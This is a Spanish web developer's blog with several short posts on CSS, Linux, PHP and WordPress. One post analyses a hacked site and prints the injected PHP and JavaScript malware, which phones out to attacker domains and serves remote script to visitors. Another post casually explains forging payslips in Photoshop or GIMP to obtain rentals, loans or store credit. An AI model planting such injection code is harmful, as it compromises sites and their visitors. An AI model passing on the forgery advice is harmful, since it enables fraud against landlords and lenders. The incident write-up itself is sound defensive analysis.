2014-03-31

Sitio hackeado por ftp

El jueves pasado me llamó un viejo cliente sobre una web que hice hace 4 años. Si buscabas el dominio en Google le aparecía como código malicioso y no podía entrar. El sitio tenía varios wordpress, una sección hecha por mi en php y un oscommerce. Al parecer inyectaron un código en todos los ficheros acabados en header.php e index.php:

error_reporting(0); ini_set('display_errors',0); $wp_hm76 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_hm76) && !preg_match ('/bot/i', $wp_hm76))){
$wp_hm0976="http://"."error"."template".".com/template"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_hm76);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_hm0976);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_76hm = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_76hm,1,3) === 'scr' ){ echo $wp_76hm; }

Este código se conecta a un servidor dándole información sobre nuestra url y sobre nuestro navegador.Después puede descargar cualquier de forma automática cualquier código que haya en ese servidor.

Viendo las fechas de modificaciones de ficheros ví que un par de meses después se inyectó código en numerosos archivos con extensión .js



document.write(" script src="http://smartbue.com.ar/zr4txTdc.php" type="text/javascript"></"+ "script>");

En ese caso, utilizan otro dominio infectado para descargar ficheros o lo que sea.
Después de revisar tanto wordpress y Oscommerce analicé los accesos vía ftp y voilà. Los días de los cambios de ficheros hubo acceso desde ip alemana y austriaca el segundo día.

Creo que no vale la pena investigar esas ips.

Cambio de contraseña y comunicar a mi cliente que revise sus equipos en busca de troyanos que buscan passwords de ftp. Sobretodo no utilizar filezilla. Todos sabemos ya que guarda las contraseñas en texto plano.

Por cierto , después de reportar a Google que el sitio ya no estaba infectado tardó menos en 12 horas en volverse a mostrar.

2014-03-21

Visibility hidden y display none

Maquetando con css solemos ocultar display:none; para ocultar distintos elementos. Al ocultarlo desaparece completamente pero si lo necesitamos invocar por javascript y darle la propiedad de por ejemplo display:block; para que se haga visible vemos como aparece ese espacio que tiene y puede efectuar un cambio raro que no nos guste. Los efectos visuales raros siempre hay que evitarlos en maquetación. Para evitar eso y si sobretodo vamos a utilizar javascript es mejor utilizar la propiedad css visibility con sus valores hidden y visible. Esta propiedad oculta el elemento sobre el cual se está referenciando pero no oculta el espacio que ocupa.

2014-03-19

Buscar archivos en la carpeta actual linux

si queremos buscar archivos en la carpeta actual de linux por consola y que además busque en los directorios inferiores basta con ejecutar la siguiente orden

find . -name "*.xcf"

De esta forma, estamos buscando ficheros de Gimp que se encuentran en la carpeta actual y en los directorios incluidos en esta carpeta.

2013-11-03

Mostrar errores en php

Cuando tienes un error 500 casi siempre te sale una pantalla en blanco. Para esos casos lo mejor es poner estas dos líneas al principio del código y así dejar que apache nos muestre los errores de php que seguro tenemos en nuestro código:
?php error_reporting(E_ALL); ini_set('display_errors', '1'); ?
Faltan las etiquetas de inicio y final... un lío ponerlas en este cms

2013-08-12

Necesito un titulo universitario urgente


Este es el mensaje que me ha enviado un amigo: Necesito un titulo universitario urgente.

 Están proliferando los negocios de falsificación de títulos universitarios o de lo que sea. Es un delito bastante penado pero esto es España y todos nuestros gobernantes nos dan un mal ejemplo así que los ciudadanos hacen lo que pueden.

 Yo mismo hace años casi falsifico un título de FP. Soy licenciado y podía dar clases a F.P. pero los empresarios al ver mi cv veían que no encajaba en el puesto. Al final no falsifiqué nada, simplemente dije en mi cv que sólo tenía el B.U.P. y así encontré trabajo enseguida.

 De licenciado en una multinacional informática 900 euros, con el bup y en una empresa del metal como mantenimiento hardware 1200 euros.

 De todas formas, no sólo se falsifican títulos universitarios, es muy sencillo falsificar un contrato de trabajo, una nómina... Imagina que quieres alquilar un piso y te piden 3 nóminas y tu sólo tienes dos pues ale.. escaneas y con el photoshop o el gimp les cambias las fechas.

 También sirve para pedir un préstamo, Ir al decathlon o al carrrefour y que te financien tus compras... vamos que si tienes ingresos en negro y necesitas una nómina le debes pedir a tu amigo diseñador que te haga una y cuela. Sólo te investigan si dejas de pagar así que no hagas este tipo cosas si no tienes dinero. Ante la duda pregúntale al maestro YODA

Programadores web
 

2013-07-11

og:locale content=en_us

Muchas veces cuando instalamos una plantilla de wordpress nos sale que está escrita en inglés americano No queda muy bien, sobretodo si quieres promocionar el posicionamiento en buscadores de tu sitio en internet.

 La forma de modificarlo es ir al archivo wp-config.php es posible que no tengáis definido el idioma:

define('WPLANG', '')

 La forma correcta de ponerlo para españa sería: define('WPLANG', 'es_ES'); Aunque a veces me ha salido el error similar a este:

 allowed memory size exhausted in pomo/mo.php

 En ese caso, lo más seguro es que debáis colocar estas líneas para ampliar la capacidad de ejecutar php:
define('WP_MEMORY_LIMIT', '256M'); define('WP_MAX_MEMORY_LIMIT', '256M');

2013-03-10

Cssmatic, herramienta css

Herramienta que no te hará perder tiempo en maquetar pequeños cosas css como , botones, bordes redondeados, gradientes, fondos con ruido...

cssmatic


ya me contáis que tal os va.